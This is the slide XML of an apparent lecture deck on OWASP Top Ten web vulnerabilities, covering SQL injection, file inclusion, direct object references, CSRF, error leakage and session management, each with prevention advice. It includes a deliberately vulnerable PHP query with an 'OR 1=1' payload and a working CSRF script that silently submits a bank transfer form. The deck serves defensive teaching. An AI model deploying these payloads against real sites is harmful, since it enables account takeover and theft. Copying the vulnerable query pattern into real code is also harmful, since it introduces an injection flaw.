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2" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId34"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId35"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="330" r:id="rId2"/>
    <p:sldId id="534" r:id="rId3"/>
    <p:sldId id="506" r:id="rId4"/>
    <p:sldId id="507" r:id="rId5"/>
    <p:sldId id="508" r:id="rId6"/>
    <p:sldId id="509" r:id="rId7"/>
    <p:sldId id="510" r:id="rId8"/>
    <p:sldId id="511" r:id="rId9"/>
    <p:sldId id="512" r:id="rId10"/>
    <p:sldId id="513" r:id="rId11"/>
    <p:sldId id="514" r:id="rId12"/>
    <p:sldId id="515" r:id="rId13"/>
    <p:sldId id="516" r:id="rId14"/>
    <p:sldId id="517" r:id="rId15"/>
    <p:sldId id="518" r:id="rId16"/>
    <p:sldId id="519" r:id="rId17"/>
    <p:sldId id="520" r:id="rId18"/>
    <p:sldId id="521" r:id="rId19"/>
    <p:sldId id="522" r:id="rId20"/>
    <p:sldId id="523" r:id="rId21"/>
    <p:sldId id="524" r:id="rId22"/>
    <p:sldId id="525" r:id="rId23"/>
    <p:sldId id="526" r:id="rId24"/>
    <p:sldId id="527" r:id="rId25"/>
    <p:sldId id="536" r:id="rId26"/>
    <p:sldId id="535" r:id="rId27"/>
    <p:sldId id="528" r:id="rId28"/>
    <p:sldId id="529" r:id="rId29"/>
    <p:sldId id="530" r:id="rId30"/>
    <p:sldId id="531" r:id="rId31"/>
    <p:sldId id="532" r:id="rId32"/>
    <p:sldId id="533" r:id="rId33"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="7010400" cy="9296400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8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B3B7EE-9478-4806-B8D5-5A18388BF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35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5AC9058-2E75-4585-961F-DF979837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04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ＭＳ Ｐゴシック" pitchFamily="3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2" charset="0"/>
        <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="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242C0CF-3710-4226-9B7F-AD8C3DB0E534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08CE8D69-6EFF-49CA-84ED-A900E7223C28}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>11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F149EC3-F054-40BF-A543-80AF2DC7D5DE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>12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F678E9E-5E2F-450F-B77C-B7740DA2696F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>14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C971DCC-5AA4-4821-97CF-CC9D9101742E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/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218E5B3-5DC6-4843-9D48-5F7411B3C30E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>16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071B687-41B9-4735-8B29-541C1967D6E2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>17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E1E312C-F99B-4AD5-8FB9-30C25A3689CC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>18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CA11D01-E4AF-48E6-971A-151D2503BC99}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>19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2D48387-1B01-4CBE-AFFB-96E390239238}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>20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53E4AC2E-941C-4DBE-AC90-B88C70A5DFBB}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>21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35AE839-5944-49F7-9873-4BC9520F1489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794B89D-AC58-422A-B157-B27978D46AE4}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>22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E81D270-2276-4974-9E6C-BDB547D8EEAE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>23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E6C25198-E08A-424C-B734-B83CD74FC101}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>24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91A532C-3237-4182-BFA6-661A349FA62B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>25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5683CE0-071F-4407-8AA2-98730E1A026E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>26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4471521-9268-4901-83D1-9105CE8AB82C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27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B7F6750-21E4-4E40-9320-EFA96B768281}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>28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8975"/>
            <a:ext cx="4676775" cy="3508375"/>
          </a:xfrm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427538"/>
            <a:ext cx="5124450" cy="419576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0632300-7722-46A2-90F1-86D5BC63E585}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>29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9F1EDB0-1D83-4DE0-B33F-5901D8E1701C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30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88A0E81-365B-48AE-B4BD-334ECA936847}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31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98C250F6-6977-44DC-ADAA-69EF2127C539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CDCEFE38-0DC6-4581-904B-27F6B9E9DCF2}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32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CE95970-FAB6-4E8C-98C8-2381EDB2FB92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F9D8AAB9-5B85-4EF5-9515-FB96287C7032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8FAAC35D-B243-41B3-AF66-C006BE9CBA0D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A5205F0E-25C2-4FE5-A671-B8B9F96FEA92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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F5B6BAD-2DD3-48F4-A286-6C5E9A3B2424}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>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D0EC739-36E9-4980-A6D6-F8701F596F4C}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>10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FF31C-0FF3-4BA3-B793-46CDB100E4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47CE7-AD13-4CAB-8762-76F72D3C6A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203CE-26CA-48E8-8F9C-EF4AB755E9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8D8526-F6FE-481F-9432-1B67E373CD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B2F0E-B937-43B5-B549-5CFE0CFCF5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F0F02-9844-45AF-BF48-B09A2A3030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AD8D7-D25E-4440-BF63-15F95139D1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5DB24-480E-4224-BD75-390C5465A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D70E9-4176-474A-A083-0DA39C5A0C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A401E-E934-41E6-BB4E-A0123EECA3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CFD7CE6-BA46-42C0-B49E-31B7683F61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59EAFA6-7F5D-408F-9948-904AA1457B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rposedrivenlife.com/basket.aspx?UserID=228473&amp;SessionID=2jQvliAq0Jb24SXYu2kF&amp;SID=1&amp;Category_ID=2&amp;Product_ID=95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ystematika.it/results.asp?SKU_PUBLISHER=CPB1360WWFS180&amp;SessionID=1073331003" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ue.eu.int/cms3_applications/applications/librarie/freeBookShop.asp?SessionID=200441131271825256632533-706011819&amp;LANG=EN&amp;BookType=1&amp;SessLang=EN&amp;cmsID=544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urehq.com/superdept.wml&amp;sessionid=200410912413626981&amp;superdeptid=30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-security.org/dl/articles/session_fixation.pdf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ntistry.superlinks.com/admin/main.cfm?CFID=000000&amp;CFTOKEN=000000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wasp.org/index.php/Category:OWASP_Top_Ten_Proje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com/evil.j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ast.info/myspac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TAGS/ref_urlencode.as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2209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Web Security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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Other considerations in input validation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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
            </a:endParaRP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Data type (string, integer, real, etc…)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Allowed character set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Minimum and maximum length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Whether null is allowed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Whether the parameter is required or not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Whether duplicates are allowed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Numeric range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Specific legal values (enumeration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specific patterns (regular expressions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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Use of Struts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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Struts is based on MVC framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Free book “Starting Struts 2” by Ian Roughley</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Specific help offered by struts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Strut Validator: ensure every form request the program accepts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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	is validated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However, not all validation can be done using Strut Validator.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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	Especially those validations that require a lot of application context</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="20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ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>2. Injection Flaws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382000" cy="5181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Injection flaws, particularly SQL injection, are common in web applications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Injection occurs when user-supplied data is sent to an interpreter as part of a command or query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The attacker's hostile data tricks the interpreter into executing unintended commands or changing data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Types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SQL, LDAP, XPATH, XSLT, HTML, XML, OS command, etc.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Example in PHP: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400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> = “SELECT * FROM table WHERE id= ‘ “ . $_REQEST[‘id’] . “’”;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Attack scenario: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>id= 1234 OR 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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Prevention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Input validation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Use strongly typed parameterized query API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Enforce least privilege (when connecting to database)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Avoid detailed error messages (they are useful to the attackers)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 dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Use stored procedures (but it isn’t 100% safe either!)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 For example exec(), concatenation of arguments)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Do not use dynamic query interfaces (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>())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Do not use simple escaping functions (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>(“’”,”’”)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Watch out for canonicalization errors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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>3. Malicious File Injection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838200" y="1827213"/>
            <a:ext cx="7845425" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>4. Insecure Direct Object Reference</a:t>
            </a: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534400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Attackers can manipulate those references to access other objects without authorization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example: 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Attacker signs on with a legitimate account number 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Site appends the account number as part of subsequent queries as either part of the URL or as a form parameter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Attacker manipulates the account number being submitted (via HTTP proxy)  and resubmits the modified query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Attacker is able to view account information of other account holders via brute force trial and error</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention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Avoid exposing private object references to users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Validate any private object references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Verify authorization to all referenced objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="14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5. Cross Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-12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153400" cy="5562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A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker.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CSRF can be as powerful as the web application that it attacks. Takes advantage of logged on session to submit malicious transactions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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User logged on online banking in one browser session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User browses a malicious site in a different window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The malicious site contains an invisible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>iFrame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="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		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&lt;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iframe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name="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myframe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" style="width:0px;height:0px;border:0px"&gt;&lt;/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iframe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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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		with the following script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&lt;script type="text/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javascript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"&gt;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function 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fillframe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()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mf = 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window.frames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["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myframe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”]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html = '&lt;form name="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getrichform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"      </a:t>
            </a:r>
            <a:b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     action="https://secure.mybank.com/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transfermoney.php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" method="post"&gt;';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html = html + ' &lt;input type="hidden" name=”amount" value="all"/&gt;';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html = html + ' &lt;input type="hidden" name="to" value="my friend bob"/&gt;';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html = html + ' &lt;input type="hidden" name="when" value="right now"/&gt;';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html = html + '&lt;/form&gt;’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="16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mf.document.body.innerHTML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= html;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>mf.document.getrichform.submit</a:t>
            </a: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();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    }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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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XSS vs. CSRF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sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>XSS exploits the trust of a client to a server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i.e. the client trusts contents from the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>CSRF exploits the trust of a server to a client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i.e. the transaction is initiated by the authenticated client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>CSRF can be launched independent of XSS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it can be launched using XSS as well</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0"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Prevention for CSRF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 wrap="none"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Ensure that there are no XSS vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Insert custom random tokens into every form and URL that will not be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> automatically submitted by the browser. For example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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&lt;form action=“/transfer.do” method=“post”&gt;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	  &lt;input type=“hidden” name =“9u09i0i” value=“58p9lkdfjlk”&gt;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	  … </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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   &lt;/form&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Verify the submitted token is valid for the current user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>For sensitive data or value transaction, re-authenticate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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6. Information Leakage and Improper Error Handling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8382000" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. 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Attackers use this weakness to steal sensitive data, or conduct more serious attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Example: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Error messages: “invalid user” and “wrong password” may give away valid user names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Better message: “invalid user name or password”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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>6. Information Leakage and Improper Error Handling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763000" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Prevention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Ensure that the entire software development team shares a common approach to exception handling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Disable or limit detailed error messages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Scrub comments/error messages for development before final release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Ensure that secure paths have multiple outcomes return similar or identical error messages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Aware that common frameworks return different HTTP error codes depending on if the error is within your custom code or within the framework code. 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Overwrite default error handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>This reduces an automated scanner’s ability to detect situations where a serious error has occurred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Managing conflicting objectives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Different mind set for secure application development vs. traditional software development</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Competing interest for help desk needs (more specific error message) vs. security considerations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Vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2867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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7. Broken Authentication and Session Management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686800" cy="5405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Account credentials and session tokens are often not properly protected. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.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Examples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Allowing user to access parts of the application without the appropriate privilege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Viewing unauthorized content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Authorization loopholes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External facing administrative interfaces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Weaknesses are more often introduced through ancillary authentication functions such as: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logout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password management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timeout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remember me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secret question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account update</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="12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r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>7. Broken Authentication and Session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763000" cy="5638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altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Prevention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Defense in depth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Well defined role based and granular access control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Use common session management mechanism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Do not roll your own unless there is a very good reason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Do not accept new, preset or invalid session identifier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Regenerate a new session upon successful authentication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Use a single, strong, authentication mechanism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Do not allow the login process to start from an unencrypted page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Ensure every page has a logout link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Use a timeout period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Correlate session IDs to a individual user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Protect ancillary authentication information the same way one protects passwords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>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>e.g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>. questions and answers for password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>reset</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400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Do not expose any session identifiers or any portion of valid credentials in URLs or logs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Be careful of sending secrets to registered email addresses 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Be careful of allowing users to change  their email address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Perhaps sent a message to the previous email address before enacting the change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endParaRPr lang="en-US" altLang="en-US" sz="16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Accidental Session ID Denial of Service Attacks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620000" cy="4429125"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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A commercial site is running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>BroadVision</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> Application Server: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Sample cookies (BV_IDS)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ccddadcmmlflldecflfcfmgdglndfkn.0:@@@@0428436698.1099845335@@@@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Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
